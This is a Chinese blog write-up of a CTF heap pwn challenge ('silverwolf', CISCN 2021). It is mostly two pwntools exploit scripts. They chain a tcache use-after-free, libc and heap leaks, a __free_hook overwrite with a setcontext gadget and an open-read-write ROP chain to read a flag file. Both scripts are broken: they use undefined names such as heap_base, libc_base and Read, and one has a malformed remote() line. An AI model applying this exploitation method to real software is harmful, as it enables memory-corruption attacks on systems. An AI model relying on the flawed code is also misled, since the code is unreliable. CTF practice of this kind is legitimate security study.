silverwolf

最新推荐文章于 2022-01-27 06:12:55 发布
最新推荐文章于 2022-01-27 06:12:55 发布
阅读量1.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/116882647
版权

这个题和看起来像lonewolf,但有沙盒规则,题目给了flag的位置,很显然是用orw来做题,我们先泄露出libc基值,rop中我们注入gadget来进行栈迁移,我们这里利用利用 setcontext 来控制rsp

from pwn import *
context.update(terminal=['tmux','splitw','-h'])
p=process('./silverwolf')
elf=ELF('./libc-2.27.so')

def add(idx,size):
    p.recvuntil('Your choice: ')
    p.sendline('1')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
    p.recvuntil('Size: ')
    p.sendline(str(size))

def edit(idx,content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
    p.recvuntil('Content: ')
    p.sendline(content)

def show(idx):
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline(str(idx))

def free(idx):
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(idx))

add(0,0x78)
add(0,0x78)
free(0)
edit(0,'aaaaaaaa')
free(0)
show(0)
p.recvuntil('Content: ')
heap_addr=u64(p.recv(6).ljust(8,'\x00'))-0xD0
success('heap_addr :'+hex(heap_addr))

edit(0,p64(heap_addr))
add(0,0x68)
add(0,0x68)
edit(0,p64(0)+p64(0xD1))
add(0,0x78)
add(0,0x78)

for i in range(4):
    free(0)
    edit(0,'aaaaaaaa')
free(0)
show(0)
p.recvuntil('Content: ')
libc_addr=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-0x3ebca0
free_hook=libc_addr+libc.sym['__free_hook']
payload='a'*0x40+p64(free_hook)+p64(0)+ p64(heap_base + 0x4000) + p64(heap_base + 0x3000 + 0x60)
payload+= p64(heap_base + 0x1000) + p64(heap_base + 0x10A0) + p64(heap_base + 0x3000)
edit(0,payload)
add(0,0x18)

pop_rdi_ret = libc_base + 0x00000000000215bf
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x0000000000043ae8
pop_rsi_ret = libc_base + 0x0000000000023eea
ret = libc_base + 0x00000000000008aa
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
syscall_ret = Read + 15
str_flag_addr  = heap_base + 0x4000
gadget = libc_base + libc.sym['setcontext'] + 53

rop_chain  = p64(pop_rdi_ret) + p64(str_flag_addr)
rop_chain += p64(pop_rsi_ret) + p64(0)
rop_chain += p64(pop_rax_ret) + p64(2)
rop_chain += p64(syscall_ret)
rop_chain += p64(pop_rdi_ret) + p64(3)
rop_chain += p64(pop_rsi_ret) + p64(heap_base  + 0x3000)
rop_chain += p64(pop_rdx_ret) + p64(0x30)
rop_chain += p64(read_addr)
rop_chain += p64(pop_rdi_ret) + p64(1)
rop_chain += p64(write_addr)

edit(0,p64(gadget))
add(0,0x38)
edit(0,'./flag\x00')
add(0,0x78)
edit(0,rop_chain[:0x60])
add(0,0x48)
edit(0,rop_chain[0x60:])
add(0,0x68)
edit(0,p64(heap_base + 0x3000) + p64(pop_rdi_ret + 1))
add(0,0x58)
free(0)
p.interactive()

沙盒规划,泄露libc和方式和lonewolf类似,利用orw来进行注入

from pwn import *
context.terminal=["gnome-terminal",'-x','sh','-c']
p=remote=("")
libc = ELF('./libc-2.27.so')

def add(size): 
    p.recvuntil("Your choice: ")
    p.sendline("1")
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Size: ")
    p.sendline(str(size))


def delete():
    p.recvuntil("Your choice: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline('0')


def edit(c="a"):
    p.recvuntil("Your choice: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Content: " )  
    p.sendline(c)  

def show():
    p.recvuntil("Your choice: ")
    p.sendline(3)
    p.recvuntil("Index: ")
    p.sendline('0')
    p.recvuntil("Content: ")

add(0x70)
delete()
edit(p64(0)+'a')
delete()
show()
heap_addr=u64(p.recv(6)+'\x00'*2)-0x260
edit(p64(heap_addr+0x10))
add(0x70)
add(0x70)
edit('\x07'*0x40)
delete()
show()
libc_base =  u64( p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
pop_rdi_ret = libc_base + 0x00000000000215BF
pop_rdx_ret = libc_base + 0x0000000000001B96
pop_rax_ret = libc_base + 0x0000000000043AE8
pop_rsi_ret = libc_base + 0x0000000000023EEA
ret = libc_base + 0x00000000000008AA
Open = libc_base + libc.sym['open']
Read = libc_base + libc.sym['read']
Write = libc_base + libc.sym['write']
syscall = Read + 15
FLAG  = heap_base + 0x4000
gadget = libc_base + libc.sym['setcontext'] + 53

orw  = p64(pop_rdi_ret) + p64(FLAG)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)
orw += p64(syscall)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(heap_base  + 0x3000)
orw += p64(pop_rdx_ret) + p64(0x30)
orw += p64(Read)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)
edit(p64(gadget))
add(0x38)
edit('./flag\x00')
add(0x78)
edit(orw[:0x60])
add(0x48)
edit(orw[0x60:])
add(0x68)
edit(p64(heap_base + 0x3000) + p64(pop_rdi_ret + 1))
add(0x58)
free()
p.interactive()
w0nderMaker
关注
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1183
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 740
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 855
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 879
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
setcontext+orw
「 虚幻私塾」
01-27 800
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 setcontext+orw 大致可以把2.27,2.29做为两个分界点。 我们先来讨论 2.27 及以下的 setcontext + orw 的写法。 首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模
长城杯2021 pwn
清霂的博客
09-20 830
长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城杯比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
linux命令find实现_find.zip
09-17
linux命令find实现_find
基于ssm的高校信息资源共享平台设计与实现.docx
09-17
基于ssm的高校信息资源共享平台设计与实现.docx
吉他谱_Plush - Stone Temple Pilots.pdf
09-17
初级入门吉他谱 guitar tab
Unit1docx
09-17
.Unit1docx
Linux下命令独占操作锁_Linux-Command-Lock.zip
最新发布
09-17
Linux下命令独占操作锁_Linux-Command-Lock
基于ssm的汉服文化平台网站设计与实现.docx
09-17
基于ssm的汉服文化平台网站设计与实现.docx
数据流通底座的构建方法与实践
09-17
内容概要:本文针对数字时代数据流通需求增加背景下,介绍了如何构建数据流通底座,确保数据资源的大规模流通,主要内容涵盖了三个部分,首先是关于构建底座的必要性和概念功能定义,其次是构建底座的实际方法探讨(包括授权、连接与存证三大功能),第三则着重强调授权机制在整个系统的实现步骤。同时,文中提到为了支持数据合法有效地流动,在实际流程设定、机制确立以及技术平台上都做出具体的设计。 适用人群:适合政府数据监管部门和技术负责人、数据要素流通相关企业和专业科研人员等专业人士。 使用场景及目标:适用于正在建设或拟建设本地化的数据流通基础设施的相关地区或机构,旨在通过规范化数据授权、安全连通各类应用场景和完善监督管理体制等方面努力,以提升整个数据要素市场的质量和效率,充分发挥数据价值,加速数字化进程。 阅读建议:本文侧重于解决当前实践中存在的数据流通障碍,并尝试为其提供一种合理的解决方案,故推荐仔细学习每一部分的设计思路和技术实现方式。
Linux命令笔记_Command-Notes.zip
09-17
Linux命令笔记_Command-Notes
c1900-universalk9-mz.SPA.150-1.M2.bin
09-17
c1900-universalk9-mz.SPA.150-1.M2.bin
基于ssm的企业公寓后勤管理系统设计与实现.docx
09-17
基于ssm的企业公寓后勤管理系统设计与实现.docx
【目标检测数据集】蛇分类检测数据集13190张12类VOC+YOLO格式.zip
09-17
数据集格式:Pascal VOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):13197 标注数量(xml文件个数):13197 标注数量(txt文件个数):13197 标注类别数:12 标注类别名称:["bungarus_candidus","bungarus_fasciatus","calloselasma_rhodostoma","daboia_siamensis","naja_fuxi","naja_kaouthia","naja_siamensis","naja_sumatrana","ophiophagus_hannah","rhabdophis_subminiatus","trimeresurus_albolabris","trimeresurus_macrops"] 每个类别标注的框数: bungarus_candidus 框数 = 1100 bungarus_fasciatus 框数 = 1108 calloselasma_rhodostoma 框数 = 1094
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值